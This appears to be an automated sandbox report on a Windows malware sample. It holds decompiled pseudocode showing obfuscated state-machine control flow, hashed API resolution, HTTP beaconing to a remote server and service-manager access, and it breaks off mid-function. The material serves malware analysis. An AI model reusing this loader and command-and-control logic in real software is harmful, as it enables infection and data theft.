                                                      			E0041ACA9(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16) {
                                                      				void* __esi;
                                                      				signed int _t11;
                                                      				void* _t14;
                                                      				intOrPtr _t17;
                                                      				void* _t18;
                                                      				struct HINSTANCE__* _t19;
                                                      				void* _t31;
                                                      				intOrPtr _t35;
                                                      				void* _t36;
                                                      				void* _t38;
                                                      
                                                      				_t38 = __eflags;
                                                      				_t32 = __edi;
                                                      				_t31 = __edx;
                                                      				_t25 = __ebx;
                                                      				_t11 = SetErrorMode(0); // executed
                                                      				SetErrorMode(_t11 | 0x00008001); // executed
                                                      				_t14 = E0040DB94(__ebx, __edi, SetErrorMode, _t38);
                                                      				_t35 = _a4;
                                                      				 *((intOrPtr*)(_t14 + 8)) = _t35;
                                                      				 *((intOrPtr*)(_t14 + 0xc)) = _t35;
                                                      				E0040D3F7(_t14);
                                                      				_t17 =  *((intOrPtr*)(E0040DB94(__ebx, __edi, _t35, _t38) + 4));
                                                      				_t39 = _t17;
                                                      				if(_t17 != 0) {
                                                      					 *((intOrPtr*)(_t17 + 0x48)) = _a12;
                                                      					 *((intOrPtr*)(_t17 + 0x4c)) = _a16;
                                                      					 *((intOrPtr*)(_t17 + 0x44)) = _t35;
                                                      					E0041AB2A(_t17, _t31, _t39);
                                                      				}
                                                      				_t18 = E0040DB94(_t25, _t32, _t35, _t39);
                                                      				_t40 =  *((char*)(_t18 + 0x14));
                                                      				_pop(_t36);
                                                      				if( *((char*)(_t18 + 0x14)) == 0) {
                                                      					E004051C9(_t36, _t40);
                                                      				}
                                                      				_t19 = GetModuleHandleA("user32.dll");
                                                      				if(_t19 != 0) {
                                                      					 *0x4462a4 = GetProcAddress(_t19, "NotifyWinEvent");
                                                      				}
                                                      				return 1;
                                                      			}













                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00000000), ref: 0041ACB2
                                                      • SetErrorMode.KERNELBASE(00000000), ref: 0041ACBA
                                                        • Part of subcall function 0040D3F7: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0040D438
                                                        • Part of subcall function 0040D3F7: SetLastError.KERNEL32(0000006F), ref: 0040D452
                                                      • GetModuleHandleA.KERNEL32(user32.dll), ref: 0041AD0C
                                                      • GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 0041AD1C
                                                        • Part of subcall function 0041AB2A: GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0041AB6D
                                                        • Part of subcall function 0041AB2A: PathFindExtensionA.KERNELBASE(?), ref: 0041AB87
                                                        • Part of subcall function 0041AB2A: __strdup.LIBCMT ref: 0041ABC9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: ErrorModule$FileModeName$AddressExtensionFindHandleLastPathProc__strdup
                                                      • String ID: NotifyWinEvent$user32.dll
                                                      • API String ID: 2454351968-597752486
                                                      • Opcode ID: 616ad4c1b5ded26846f479a85218188d3b388f4c8ca7b456c2135a77635ce7eb
                                                      • Instruction ID: f2694494a373e7eb832031faae720e4f62f99ff10030d8dbc4a867b38e11be65
                                                      • Opcode Fuzzy Hash: 616ad4c1b5ded26846f479a85218188d3b388f4c8ca7b456c2135a77635ce7eb
                                                      • Instruction Fuzzy Hash: 4B01D470A007504FC710EF75D405A5A3BA4AF48700F06846FF444A7392EB38E844CB5E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      C-Code - Quality: 89%
                                                      			E0230216D(WCHAR* __ecx, short __edx, WCHAR* _a4, WCHAR* _a8, void** _a12, intOrPtr _a16) {
                                                      				WCHAR* _v4;
                                                      				short _v8;
                                                      				signed int _v12;
                                                      				void* _v16;
                                                      				void* _v20;
                                                      				WCHAR* _v24;
                                                      				WCHAR* _v28;
                                                      				void* _v36;
                                                      				WCHAR* _v44;
                                                      				WCHAR* _v48;
                                                      				void* _v52;
                                                      				intOrPtr _v60;
                                                      				void* _t36;
                                                      				void* _t39;
                                                      				intOrPtr* _t50;
                                                      				void* _t51;
                                                      				void* _t62;
                                                      				void* _t66;
                                                      				long _t70;
                                                      				WCHAR* _t72;
                                                      				void* _t83;
                                                      				long _t99;
                                                      				WCHAR* _t103;
                                                      				void* _t106;
                                                      				void** _t116;
                                                      				signed int _t119;
                                                      				void* _t126;
                                                      				void* _t127;
                                                      				void* _t130;
                                                      
                                                      				_t70 = 0;
                                                      				_v8 = __edx;
                                                      				_v12 = _v12 & 0;
                                                      				_t103 = 0;
                                                      				_v4 = __ecx;
                                                      				_t119 = 0x1dfa9e13;
                                                      				_t127 = _v4;
                                                      				_t72 = 0;
                                                      				_t116 = _a12;
                                                      				_v24 = 0;
                                                      				_v28 = 0;
                                                      				while(1) {
                                                      					L1:
                                                      					while(1) {
                                                      						_t130 = _t119 - 0x1d07cf5f;
                                                      						if(_t130 > 0) {
                                                      							goto L23;
                                                      						}
                                                      						L3:
                                                      						if(_t130 == 0) {
                                                      							if(_t116 != 0) {
                                                      								_t72 = E02302674(0x2309140);
                                                      								_v28 = _t72;
                                                      							}
                                                      							E02302F84(0x65f478f7, 0xb9a26286, 0xb9);
                                                      							_t39 = HttpOpenRequestW(_v20, _t72, _a4, 0, 0, 0, 0x844cc300, 0); // executed
                                                      							_t127 = _t39;
                                                      							E02302FDF(_v60);
                                                      							_t119 =  !=  ? 0x33bc9282 : 0x1a970afc;
                                                      							goto L10;
                                                      						} else {
                                                      							if(_t119 == 0xfbdb1b7) {
                                                      								E02302F84(0x65f478f7, 0x305025f2, 0x1ce);
                                                      								_t36 = InternetConnectW(_v16, _v4, _v8, 0, 0, 3, 0, 0); // executed
                                                      								_v52 = _t36;
                                                      								_t119 =  !=  ? 0x1d07cf5f : 0x2a4cc55c;
                                                      								goto L11;
                                                      							} else {
                                                      								if(_t119 == 0x1181d787) {
                                                      									_t106 = 0x13;
                                                      									E0230212D(_t106);
                                                      									_t119 =  ==  ? 0x28dc56b0 : 0x1ace62c9;
                                                      									goto L10;
                                                      								} else {
                                                      									if(_t119 == 0x174c96ba) {
                                                      										_v12 = 0x200;
                                                      										_t126 = E02303037(0x200);
                                                      										if(_t126 != 0) {
                                                      											_t50 = E02302F84(0x1e98bdc2, 0xa9ff5dfa, 0xe6);
                                                      											_t83 = 0; // executed
                                                      											_t51 =  *_t50(_t126,  &_v12); // executed
                                                      											if(_t51 == 0) {
                                                      												_push(_t83);
                                                      												_push(_t83);
                                                      												_v36 = E02303DA2(_t126);
                                                      											}
                                                      											E02302FDF(_t126);
                                                      										}
                                                      										_t119 = 0x2e7438dc;
                                                      										goto L10;
                                                      									} else {
                                                      										if(_t119 == 0x1a970afc) {
                                                      											_push(_t36);
                                                      											 *((intOrPtr*)(E02302F84(0x65f478f7, 0x11e66bc3, 0x36)))();
                                                      											_t119 = 0x2a4cc55c;
                                                      											goto L10;
                                                      										} else {
                                                      											if(_t119 != 0x1ace62c9) {
                                                      												L38:
                                                      												if(_t119 != 0x37041747) {
                                                      													goto L1;
                                                      												}
                                                      											} else {
                                                      												E02302F84(0x65f478f7, 0x11e66bc3, 0x36);
                                                      												InternetCloseHandle(_t127); // executed
                                                      												_t119 = 0x1a970afc;
                                                      												L10:
                                                      												_t36 = _v20;
                                                      												L11:
                                                      												_t72 = _v28;
                                                      												_t103 = _v24;
                                                      												_t130 = _t119 - 0x1d07cf5f;
                                                      												if(_t130 > 0) {
                                                      													goto L23;
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						L41:
                                                      						return _t70;
                                                      						L23:
                                                      						if(_t119 == 0x1dfa9e13) {
                                                      							_t119 = 0x174c96ba;
                                                      							goto L38;
                                                      						} else {
                                                      							if(_t119 == 0x28dc56b0) {
                                                      								E0230205A(_a16);
                                                      								_t119 = 0x1ace62c9;
                                                      								_t70 =  !=  ? 1 : _t70;
                                                      								goto L10;
                                                      							} else {
                                                      								if(_t119 == 0x2a4cc55c) {
                                                      									_push(_v16);
                                                      									 *((intOrPtr*)(E02302F84(0x65f478f7, 0x11e66bc3, 0x36)))();
                                                      								} else {
                                                      									if(_t119 == 0x2e7438dc) {
                                                      										E02302F84(0x65f478f7, 0xbf8bd310, 0x3f);
                                                      										_t62 = InternetOpenW(_t103, 0, 0, 0, 0); // executed
                                                      										_v36 = _t62;
                                                      										_t119 =  !=  ? 0xfbdb1b7 : 0x37041747;
                                                      										E02302FDF(_v44);
                                                      										_t72 = _v48;
                                                      										_t103 = _v44;
                                                      										goto L38;
                                                      									} else {
                                                      										if(_t119 != 0x33bc9282) {
                                                      											goto L38;
                                                      										} else {
                                                      											if(_t116 == 0) {
                                                      												_t99 = 0;
                                                      											} else {
                                                      												_t99 = _t116[1];
                                                      											}
                                                      											if(_t116 == 0) {
                                                      												_t66 = 0;
                                                      											} else {
                                                      												_t66 =  *_t116;
                                                      											}
                                                      											E02302F84(0x65f478f7, 0x60bb4c24, 0x3d);
                                                      											HttpSendRequestW(_t127, _a8, 0xffffffff, _t66, _t99); // executed
                                                      											asm("sbb esi, esi");
                                                      											_t119 = (_t119 & 0xf6b374be) + 0x1ace62c9;
                                                      											goto L10;
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						goto L41;
                                                      					}
                                                      				}
                                                      			}

































                                                      APIs
                                                      • InternetCloseHandle.WININET(?,00000000,?,?,?,?,?,?,?,2895FB0B,?,?), ref: 023021F8
                                                      • ObtainUserAgentString.URLMON(00000000,00000000,?,00000000,?,?,?,?,?,?,?,2895FB0B,?,?), ref: 0230225C
                                                      • InternetConnectW.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,?,?), ref: 023022C9
                                                      • HttpOpenRequestW.WININET(?,00000000,?,00000000,00000000,00000000,844CC300,00000000,00000000,?,?,?,?,?,?,?), ref: 02302320
                                                      • HttpSendRequestW.WININET(?,?,000000FF,00000000,00000000,00000000,?,?,?,?,?,?,?,2895FB0B,?,?), ref: 023023AB
                                                      • InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,2895FB0B,?,?), ref: 023023DB
                                                        • Part of subcall function 02302FDF: RtlFreeHeap.NTDLL(00000000,00000000,005B4C50), ref: 02303012
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.615127704.0000000002301000.00000020.00000001.sdmp, Offset: 02300000, based on PE: true
                                                      • Associated: 00000003.00000002.615121787.0000000002300000.00000004.00000001.sdmp
                                                      • Associated: 00000003.00000002.615142665.0000000002309000.00000004.00000001.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_2300000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Internet$HttpOpenRequest$AgentCloseConnectFreeHandleHeapObtainSendStringUser
                                                      • String ID:
                                                      • API String ID: 3667348119-0
                                                      • Opcode ID: f701a5df34b4201b4a27d6f2c11009cbcf353d500af73f89048eb1773a987723
                                                      • Instruction ID: 4e6e707723317106020883b55217a0f742e85fd52055cd450a57af0260b80555
                                                      • Opcode Fuzzy Hash: f701a5df34b4201b4a27d6f2c11009cbcf353d500af73f89048eb1773a987723
                                                      • Instruction Fuzzy Hash: BE614E35B083126BD668EA6848ECA3FB5DE9BC8350F90056DFC55DB2C5DB20DD058BB2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 94%
                                                      			E0040C572(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
                                                      				intOrPtr _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				char* _v20;
                                                      				signed int _v28;
                                                      				intOrPtr _v32;
                                                      				intOrPtr _v40;
                                                      				intOrPtr _v52;
                                                      				signed int _v56;
                                                      				void* __ebp;
                                                      				intOrPtr _t122;
                                                      				void* _t128;
                                                      				intOrPtr _t130;
                                                      				signed int _t139;
                                                      				signed int _t144;
                                                      				signed int _t173;
                                                      				signed int _t175;
                                                      				signed int _t177;
                                                      				signed int _t179;
                                                      				signed int _t181;
                                                      				signed int _t183;
                                                      				signed int _t187;
                                                      				void* _t190;
                                                      				intOrPtr _t191;
                                                      				signed int _t201;
                                                      
                                                      				_t190 = __ecx;
                                                      				_t122 = E0040DB94(__ebx, __edi, __esi, __eflags);
                                                      				_v8 = _t122;
                                                      				_t3 =  &_a4;
                                                      				 *_t3 = _a4 &  !( *(_t122 + 0x18));
                                                      				if( *_t3 == 0) {
                                                      					return 1;
                                                      				}
                                                      				_push(__ebx);
                                                      				_push(__esi);
                                                      				_push(__edi);
                                                      				_t201 = 0;
                                                      				E0041F330(0,  &_v56, 0, 0x28);
                                                      				_v52 = DefWindowProcA;
                                                      				_t128 = E0040DB94(__ebx, 0, 0, __eflags);
                                                      				__eflags = _a4 & 0x00000001;
                                                      				_v40 =  *((intOrPtr*)(_t128 + 8));
                                                      				_t130 =  *0x4465b8; // 0x10003
                                                      				_t187 = 8;
                                                      				_v32 = _t130;
                                                      				_v16 = _t187;
                                                      				if(__eflags != 0) {
                                                      					_push( &_v56);
                                                      					_v56 = 0xb;
                                                      					_v20 = "AfxWnd80s";
                                                      					_t183 = E0040C38E(_t187, _t190, 0, 0, __eflags);
                                                      					__eflags = _t183;
                                                      					if(_t183 != 0) {
                                                      						_t201 = 1;
                                                      						__eflags = 1;
                                                      					}
                                                      				}
                                                      				__eflags = _a4 & 0x00000020;
                                                      				if(__eflags != 0) {
                                                      					_v56 = _v56 | 0x0000008b;
                                                      					_push( &_v56);
                                                      					_v20 = "AfxOleControl80s";
                                                      					_t181 = E0040C38E(_t187, _t190, 0, _t201, __eflags);
                                                      					__eflags = _t181;
                                                      					if(_t181 != 0) {
                                                      						_t201 = _t201 | 0x00000020;
                                                      						__eflags = _t201;
                                                      					}
                                                      				}
                                                      				__eflags = _a4 & 0x00000002;
                                                      				if(__eflags != 0) {
                                                      					_push( &_v56);
                                                      					_v56 = 0;
                                                      					_v20 = "AfxControlBar80s";
                                                      					_v28 = 0x10;
                                                      					_t179 = E0040C38E(_t187, _t190, 0, _t201, __eflags);
                                                      					__eflags = _t179;
                                                      					if(_t179 != 0) {
                                                      						_t201 = _t201 | 0x00000002;
                                                      						__eflags = _t201;
                                                      					}
                                                      				}
                                                      				__eflags = _a4 & 0x00000004;
                                                      				if(__eflags != 0) {
                                                      					_v56 = _t187;
                                                      					_v28 = 0;
                                                      					_t177 = E0040C531(_t190, __eflags,  &_v56, "AfxMDIFrame80s", 0x7a01);
                                                      					__eflags = _t177;
                                                      					if(_t177 != 0) {
                                                      						_t201 = _t201 | 0x00000004;
                                                      						__eflags = _t201;
                                                      					}
                                                      				}
                                                      				__eflags = _a4 & _t187;
                                                      				if(__eflags != 0) {
                                                      					_v56 = 0xb;
                                                      					_v28 = 6;
                                                      					_t175 = E0040C531(_t190, __eflags,  &_v56, "AfxFrameOrView80s", 0x7a02);
                                                      					__eflags = _t175;
                                                      					if(_t175 != 0) {
                                                      						_t201 = _t201 | _t187;
                                                      						__eflags = _t201;
                                                      					}
                                                      				}
                                                      				__eflags = _a4 & 0x00000010;
                                                      				if(__eflags != 0) {
                                                      					_v12 = 0xff;
                                                      					_t173 = E0040A1C2(_t187, _t190, _t201, __eflags,  &_v16, 0x3fc0); // executed
                                                      					_t201 = _t201 | _t173;
                                                      					_t48 =  &_a4;
                                                      					 *_t48 = _a4 & 0xffffc03f;
                                                      					__eflags =  *_t48;
                                                      				}
                                                      				__eflags = _a4 & 0x00000040;
                                                      				if(__eflags != 0) {
                                                      					_v12 = 0x10;
                                                      					_t201 = _t201 | E0040A1C2(_t187, _t190, _t201, __eflags,  &_v16, 0x40);
                                                      					__eflags = _t201;
                                                      				}
                                                      				__eflags = _a4 & 0x00000080;
                                                      				if(__eflags != 0) {
                                                      					_v12 = 2;
                                                      					_t201 = _t201 | E0040A1C2(_t187, _t190, _t201, __eflags,  &_v16, 0x80);
                                                      					__eflags = _t201;
                                                      				}
                                                      				__eflags = _a4 & 0x00000100;
                                                      				if(__eflags != 0) {
                                                      					_v12 = _t187;
                                                      					_t201 = _t201 | E0040A1C2(_t187, _t190, _t201, __eflags,  &_v16, 0x100);
                                                      					__eflags = _t201;
                                                      				}
                                                      				__eflags = _a4 & 0x00000200;
                                                      				if(__eflags != 0) {
                                                      					_v12 = 0x20;
                                                      					_t201 = _t201 | E0040A1C2(_t187, _t190, _t201, __eflags,  &_v16, 0x200);
                                                      					__eflags = _t201;
                                                      				}
                                                      				__eflags = _a4 & 0x00000400;
                                                      				if(__eflags != 0) {
                                                      					_v12 = 1;
                                                      					_t201 = _t201 | E0040A1C2(0x400, _t190, _t201, __eflags,  &_v16, 0x400);
                                                      					__eflags = _t201;
                                                      				}
                                                      				__eflags = _a4 & 0x00000800;
                                                      				if(__eflags != 0) {
                                                      					_v12 = 0x40;
                                                      					_t201 = _t201 | E0040A1C2(0x400, _t190, _t201, __eflags,  &_v16, 0x800);
                                                      					__eflags = _t201;
                                                      				}
                                                      				__eflags = _a4 & 0x00001000;
                                                      				if(__eflags != 0) {
                                                      					_v12 = 4;
                                                      					_t201 = _t201 | E0040A1C2(0x400, _t190, _t201, __eflags,  &_v16, 0x1000);
                                                      					__eflags = _t201;
                                                      				}
                                                      				__eflags = _a4 & 0x00002000;
                                                      				if(__eflags != 0) {
                                                      					_v12 = 0x80;
                                                      					_t201 = _t201 | E0040A1C2(0x400, _t190, _t201, __eflags,  &_v16, 0x2000);
                                                      					__eflags = _t201;
                                                      				}
                                                      				__eflags = _a4 & 0x00004000;
                                                      				if(__eflags != 0) {
                                                      					_v12 = 0x800;
                                                      					_t201 = _t201 | E0040A1C2(0x400, _t190, _t201, __eflags,  &_v16, 0x4000);
                                                      					__eflags = _t201;
                                                      				}
                                                      				__eflags = _a4 & 0x00008000;
                                                      				if(__eflags != 0) {
                                                      					_v12 = 0x400;
                                                      					_t201 = _t201 | E0040A1C2(0x400, _t190, _t201, __eflags,  &_v16, 0x8000);
                                                      					__eflags = _t201;
                                                      				}
                                                      				__eflags = _a4 & 0x00010000;
                                                      				if(__eflags != 0) {
                                                      					_v12 = 0x200;
                                                      					_t201 = _t201 | E0040A1C2(0x400, _t190, _t201, __eflags,  &_v16, 0x10000);
                                                      					__eflags = _t201;
                                                      				}
                                                      				__eflags = _a4 & 0x00020000;
                                                      				if(__eflags != 0) {
                                                      					_v12 = 0x100;
                                                      					_t201 = _t201 | E0040A1C2(0x400, _t190, _t201, __eflags,  &_v16, 0x20000);
                                                      					__eflags = _t201;
                                                      				}
                                                      				__eflags = _a4 & 0x00040000;
                                                      				if(__eflags != 0) {
                                                      					_v12 = 0x8000;
                                                      					_t201 = _t201 | E0040A1C2(0x400, _t190, _t201, __eflags,  &_v16, 0x40000);
                                                      					__eflags = _t201;
                                                      				}
                                                      				_t191 = _v8;
                                                      				 *(_t191 + 0x18) =  *(_t191 + 0x18) | _t201;
                                                      				_t139 =  *(_t191 + 0x18);
                                                      				__eflags = (_t139 & 0x00003fc0) - 0x3fc0;
                                                      				if((_t139 & 0x00003fc0) == 0x3fc0) {
                                                      					 *(_t191 + 0x18) = _t139 | 0x00000010;
                                                      					_t201 = _t201 | 0x00000010;
                                                      					__eflags = _t201;
                                                      				}
                                                      				asm("sbb eax, eax");
                                                      				_t144 =  ~((_t201 & _a4) - _a4) + 1;
                                                      				__eflags = _t144;
                                                      				return _t144;
                                                      			}

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: _memset
                                                      • String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
                                                      • API String ID: 2102423945-4122032997
                                                      • Opcode ID: af90f3d793df6aa5d0f43c2ff2de7d4dbca73bf6dbea27fcc50b6289e62f7852
                                                      • Instruction ID: e6b970e612583588a719d793e0dd92c83582657bdf5cb49032b9efa87aaaa162
                                                      • Opcode Fuzzy Hash: af90f3d793df6aa5d0f43c2ff2de7d4dbca73bf6dbea27fcc50b6289e62f7852
                                                      • Instruction Fuzzy Hash: C3810171D00219AADB50DFA4C4C5BDEBBF9AF08344F24817AF914F62C1E7789A44CB99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 92%
                                                      			E02303B4E() {
                                                      				signed char _v2;
                                                      				signed int _v276;
                                                      				signed int _v280;
                                                      				char _v284;
                                                      				signed short _v320;
                                                      				void* _t8;
                                                      				void* _t29;
                                                      
                                                      				_t8 = 0x15d9ec19;
                                                      				_t29 = 0;
                                                      				do {
                                                      					while(_t8 != 0x15d9ec19) {
                                                      						if(_t8 == 0x16aa3898) {
                                                      							_t29 = _t29 + _v280 * 0x3e8;
                                                      							_t8 = 0x178645ae;
                                                      							continue;
                                                      						} else {
                                                      							if(_t8 == 0x178645ae) {
                                                      								_t29 = _t29 + _v276 * 0x64;
                                                      								_t8 = 0x38ea8c1c;
                                                      								continue;
                                                      							} else {
                                                      								if(_t8 == 0x1c5820e2) {
                                                      									_v284 = 0x11c;
                                                      									_push( &_v284);
                                                      									 *((intOrPtr*)(E02302F84(0xa83808e5, 0x11702f10, 0x1f8)))();
                                                      									_t8 = 0x1f928384;
                                                      									continue;
                                                      								} else {
                                                      									if(_t8 == 0x1f928384) {
                                                      										_push( &_v320);
                                                      										 *((intOrPtr*)(E02302F84(0xf568ce83, 0xdcd4d836, 0x86)))(); // executed
                                                      										_t8 = 0x20505ee2;
                                                      										continue;
                                                      									} else {
                                                      										if(_t8 == 0x20505ee2) {
                                                      											_t29 = _t29 + (_v2 & 0x000000ff) * 0x186a0;
                                                      											_t8 = 0x16aa3898;
                                                      											continue;
                                                      										} else {
                                                      											if(_t8 != 0x38ea8c1c) {
                                                      												goto L16;
                                                      											} else {
                                                      												_t29 = _t29 + (_v320 & 0x0000ffff);
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						L9:
                                                      						return _t29;
                                                      					}
                                                      					_t8 = 0x1c5820e2;
                                                      					L16:
                                                      				} while (_t8 != 0x30345473);
                                                      				goto L9;
                                                      			}

                                                      APIs
                                                      • GetNativeSystemInfo.KERNELBASE(?,?,2895FB0B,?,?), ref: 02303BEB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.615127704.0000000002301000.00000020.00000001.sdmp, Offset: 02300000, based on PE: true
                                                      • Associated: 00000003.00000002.615121787.0000000002300000.00000004.00000001.sdmp
                                                      • Associated: 00000003.00000002.615142665.0000000002309000.00000004.00000001.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_2300000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: InfoNativeSystem
                                                      • String ID: sT40$^P $^P
                                                      • API String ID: 1721193555-826379165
                                                      • Opcode ID: 1bfbde6b4ed4b2435eebdf135c5f5d12d38efa86e7b6a1fd41a50dec05332954
                                                      • Instruction ID: 1d7df8740b9e144d523fee5e5309b2126c97b7b0b78be710a3be066d0d7104d3
                                                      • Opcode Fuzzy Hash: 1bfbde6b4ed4b2435eebdf135c5f5d12d38efa86e7b6a1fd41a50dec05332954
                                                      • Instruction Fuzzy Hash: 47115B657083115BC778E91E8DE527EA5CCD784248F9808BBF985CB7D1DA2AC98483B3
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00403A3A(intOrPtr __ecx) {
                                                      				void* _v8;
                                                      				char _v12;
                                                      				int _v16;
                                                      				intOrPtr _v20;
                                                      				int _v24;
                                                      				long _t29;
                                                      				char* _t30;
                                                      				intOrPtr _t32;
                                                      				char** _t34;
                                                      				signed int _t39;
                                                      				char** _t43;
                                                      				char* _t45;
                                                      
                                                      				 *((intOrPtr*)(__ecx + 0xa0)) = 0;
                                                      				_t45 =  *0x44251c; // 0x435040
                                                      				_v20 = __ecx;
                                                      				_v8 = 0;
                                                      				_v12 = 0;
                                                      				_v24 = 4;
                                                      				_v16 = 0;
                                                      				_t34 = 0x44251c;
                                                      				if(_t45 == 0) {
                                                      					L14:
                                                      					return 1;
                                                      				}
                                                      				do {
                                                      					_t29 = RegOpenKeyExA(0x80000001,  *_t34, 0, 1,  &_v8); // executed
                                                      					if(_t29 != 0) {
                                                      						goto L12;
                                                      					}
                                                      					_t43 = _t34[1];
                                                      					while(1) {
                                                      						_t30 =  *_t43;
                                                      						if(_t30 == 0) {
                                                      							break;
                                                      						}
                                                      						if(RegQueryValueExA(_v8, _t30, 0,  &_v16,  &_v12,  &_v24) == 0 && _v16 == 4) {
                                                      							_t39 = _t43[1];
                                                      							_t32 = _v20;
                                                      							if(_v12 == 0) {
                                                      								 *(_t32 + 0xa0) =  *(_t32 + 0xa0) &  !_t39;
                                                      							} else {
                                                      								 *(_t32 + 0xa0) =  *(_t32 + 0xa0) | _t39;
                                                      							}
                                                      						}
                                                      						_v12 = 0;
                                                      						_v24 = 4;
                                                      						_v16 = 0;
                                                      						_t43 =  &(_t43[2]);
                                                      					}
                                                      					RegCloseKey(_v8);
                                                      					_v8 = 0;
                                                      					L12:
                                                      					_t34 =  &(_t34[2]);
                                                      				} while ( *_t34 != 0);
                                                      				goto L14;
                                                      			}

                                                      APIs
                                                      • RegOpenKeyExA.KERNELBASE(80000001,@PC,00000000,00000001,?), ref: 00403A7D
                                                      • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000004), ref: 00403A9D
                                                      • RegCloseKey.ADVAPI32(?), ref: 00403AE1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: @PC
                                                      • API String ID: 3677997916-3669301676
                                                      • Opcode ID: 7e3950ef7bce093945acdd9d3cc986913b746b0efde1205527eef0e1a10a9443
                                                      • Instruction ID: ba0bfb9c3578450b4f1f1542634a8380ad0c35d974bf2591f2b7a0502db76563
                                                      • Opcode Fuzzy Hash: 7e3950ef7bce093945acdd9d3cc986913b746b0efde1205527eef0e1a10a9443
                                                      • Instruction Fuzzy Hash: CF2107B1E10208EFDB15CF85D944AAEBBB8FF91706F1440AAE591B6290D3795B00CF25
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 79%
                                                      			E023067ED() {
                                                      				char _v524;
                                                      				void* _v528;
                                                      				char _v536;
                                                      				void* _v544;
                                                      				void* _t11;
                                                      				intOrPtr _t12;
                                                      				intOrPtr _t21;
                                                      				void* _t23;
                                                      				intOrPtr _t24;
                                                      				intOrPtr _t28;
                                                      				intOrPtr _t29;
                                                      				void* _t33;
                                                      				void* _t34;
                                                      				intOrPtr _t43;
                                                      				intOrPtr _t48;
                                                      				void* _t60;
                                                      				short* _t61;
                                                      				void* _t64;
                                                      
                                                      				_t34 = _v528;
                                                      				_t11 = 0x2b1f137a;
                                                      				_t61 = 0;
                                                      				goto L1;
                                                      				do {
                                                      					while(1) {
                                                      						L1:
                                                      						_t64 = _t11 - 0x22afb69c;
                                                      						if(_t64 > 0) {
                                                      							break;
                                                      						}
                                                      						if(_t64 == 0) {
                                                      							_t21 =  *0x230a4c4; // 0x5b4dc8
                                                      							_t60 = 0x1c;
                                                      							 *((intOrPtr*)(_t21 + 0x250)) = 0x2305793;
                                                      							L14:
                                                      							_t11 = 0x9076f63;
                                                      							continue;
                                                      						}
                                                      						if(_t11 == 0x502f5b) {
                                                      							E02302F84(0x4836b0ed, 0x7fd8698, 0x1c5);
                                                      							_t23 = OpenSCManagerW(0, 0, 0xf003f); // executed
                                                      							_t34 = _t23;
                                                      							if(_t34 == 0) {
                                                      								_t11 = 0x22afb69c;
                                                      							} else {
                                                      								_t24 =  *0x230a4c4; // 0x5b4dc8
                                                      								 *((intOrPtr*)(_t24 + 0x264)) = 1;
                                                      								_t11 = 0x4ef3871;
                                                      							}
